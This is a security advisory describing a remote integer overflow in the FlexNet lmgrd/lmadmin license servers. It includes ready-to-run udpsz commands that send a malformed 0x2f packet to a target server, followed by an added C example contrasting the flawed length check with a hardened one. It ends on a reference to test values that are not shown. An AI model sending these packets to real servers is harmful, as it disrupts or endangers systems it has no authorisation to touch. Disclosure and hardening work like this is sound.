#######################################################################

                             Luigi Auriemma

Application:  FlexNet License Server Manager
              http://www.flexerasoftware.com/products/flexnet-publisher.htm
              http://www.globes.com
Versions:     <= 11.9 and others earlier
              (this version number was written when I found the advisory
              many months/years ago)
Platforms:    AIX, HP-UX, Linux, Mac OSX, Windows, SGI, Solaris
Bug:          integer overflow in lmgrd and lmadmin
Exploitation: remote, versus server
Date:         found 25 Oct 2010
              fixed 17 Aug 2011
              advisory 13 May 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

"FlexNet Publisher software licensing makes it easy for software vendors
and high-tech manufacturers to manage, secure, enhance, and grow market
share through flexible pricing, packaging, licensing, and protection of
their software and SaaS offerings."

#######################################################################

======
2) Bug
======

lmadmin and lmgrd are two license server managers listening on port
27000 and usually running as system services in the products of various
vendors like IBM, HP, Sybase, Citrix, VMware, SolidWorks and so on.
The only difference between the two servers is that lmadmin includes a
web interface from which it can be configured and managed.

For the handling of packet type 0x2f the server first receives the 20
bytes that make up the header of this type, then takes the 16-bit
number at offset 4, which specifies the size of the whole packet
(header included), and subtracts the 20 bytes just read.

No check is performed on the resulting value, so it is passed directly
to recv() to read the rest of the data from the socket, appending it to
the header already stored in the heap:

  len = *(u16 *)(buff + 4) - 20;  // from -1 to -20 when the field is 0..19
  recv(sd, buff + 20, len, 0);

The Windows platform is not affected by the vulnerability because the
recv() function of Winsock doesn't work with negative lengths.

The complexity of lmadmin, caused by the inclusion of a complete web
server (components of Apache) supporting POST, may help in exploiting
this vulnerability by giving the attacker more possibilities of
controlling the code flow.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

  udpsz -D -T -C "2f 2f 0000 0000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 8000

or

  udpsz -l 1 -D -T -C "2f 2f 0000 0000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 1030

Little note: the byte at offset 1 is a simple checksum of the 20-byte
header.

#######################################################################

======
4) Fix
======

It's unclear if the bug has been fixed or not.

#######################################################################
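The length handling from section 2, shown as an added example that is not code from the advisory or from the FlexNet product: the unchecked computation the advisory describes beside a hardened version that validates the 16-bit field before any recv() length is derived from it. The enum and function names, the 8000-byte buffer capacity used in comments, and the host-order read of the field (mirroring `*(u16 *)(buff + 4)`) are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>

#define HDR_LEN 20  /* fixed header size of packet type 0x2f, per the advisory */

/* Hypothetical status codes for the hardened check (part of this added example). */
enum pkt_len_status { PKT_TOO_SHORT = -1, PKT_TOO_LONG = -2 };

/* The vulnerable computation the advisory describes: the 16-bit total length
 * at offset 4 minus the 20-byte header, with no range check. A total of 0..19
 * yields -20..-1, which the original code handed straight to recv(). */
int vuln_body_len(const unsigned char *hdr)
{
    uint16_t total;
    memcpy(&total, hdr + 4, sizeof total);  /* same host-order read as *(u16 *)(buff + 4) */
    return (int)total - HDR_LEN;
}

/* Hardened version: the total must cover at least the header and must fit in
 * the heap buffer (bufcap bytes, e.g. 8000) before it is used as a recv() length.
 * Returns the body length (>= 0) or a negative pkt_len_status. */
long safe_body_len(const unsigned char *hdr, size_t bufcap)
{
    uint16_t total;
    memcpy(&total, hdr + 4, sizeof total);
    if (total < HDR_LEN)
        return PKT_TOO_SHORT;               /* would go negative in the original */
    if ((size_t)total > bufcap)
        return PKT_TOO_LONG;                /* would overrun buff + 20 */
    return (long)total - HDR_LEN;
}

/* Read the rest of a 0x2f packet whose 20-byte header is already in buff,
 * but only after the length has been validated. Returns bytes read, or -1
 * when the packet is dropped without ever calling recv(). */
ssize_t recv_packet_body(int sd, unsigned char *buff, size_t bufcap)
{
    long len = safe_body_len(buff, bufcap);
    if (len < 0)
        return -1;
    if (len == 0)
        return 0;                           /* header-only packet, nothing to read */
    return recv(sd, buff + HDR_LEN, (size_t)len, 0);
}
```

The test values below use byte-symmetric fields (0x0000, 0x1313, 0x1414, 0xffff) so the results do not depend on host byte order.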